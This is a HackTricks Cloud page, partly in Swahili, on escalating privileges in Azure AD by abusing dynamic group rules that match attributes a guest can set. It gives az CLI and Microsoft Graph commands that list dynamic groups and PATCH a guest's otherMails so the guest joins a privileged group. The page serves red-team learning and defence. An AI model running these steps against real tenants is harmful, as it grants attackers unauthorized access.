Az - Dynamic Groups Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Dynamic groups ni vikundi ambavyo vina seti ya kanuni zilizowekwa na watumiaji wote au vifaa vinavyolingana na kanuni hizo vinajumuishwa kwenye kundi. Kila wakati sifa za mtumiaji au kifaa zinapobadilishwa, kanuni za dynamic zinarejelewa. Na wakati kanuni mpya inaundwa, vifaa vyote na watumiaji vinakaguliwa.

Dynamic groups zinaweza kuwa na Azure RBAC roles zilizotolewa kwao, lakini si rahisi kuongeza AzureAD roles kwa dynamic groups.

Kipengele hiki kinahitaji leseni ya Azure AD premium P1.

Privesc

Kumbuka kwamba kwa kawaida mtumiaji yeyote anaweza kuwalika wageni katika Azure AD, hivyo, ikiwa kanuni ya dynamic group inatoa idhini kwa watumiaji kulingana na sifa ambazo zinaweza kuwekwa kwa mgeni mpya, inawezekana kuunda mgeni mwenye sifa hizi na kuinua mamlaka. Pia inawezekana kwa mgeni kusimamia wasifu wake mwenyewe na kubadilisha sifa hizi.

Pata vikundi vinavyoruhusu Uanachama wa Dynamic: az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table

Example

Mfano wa kanuni: (user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")
Maelezo ya kanuni: Mtumiaji yeyote wa Mgeni mwenye barua pepe ya pili yenye maandiko 'security' ataongezwa kwenye kundi

Kwa barua pepe ya mtumiaji wa Mgeni, kubali mwaliko na angalia mipangilio ya sasa ya mtumiaji huyo katika https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView. Kwa bahati mbaya, ukurasa haukuruhusu kubadilisha thamani za sifa hivyo tunahitaji kutumia API:

# Login with the gust user
az login --allow-no-subscriptions

# Get user object ID
az ad signed-in-user show

# Update otherMails
az rest --method PATCH \
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--headers 'Content-Type=application/json' \
--body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}'

# Verify the update
az rest --method GET \
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--query "otherMails"

Marejeleo

https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAz - Conditional Access Policies & MFA Bypass NextAz - Key Vault Privesc

Last updated 3 days ago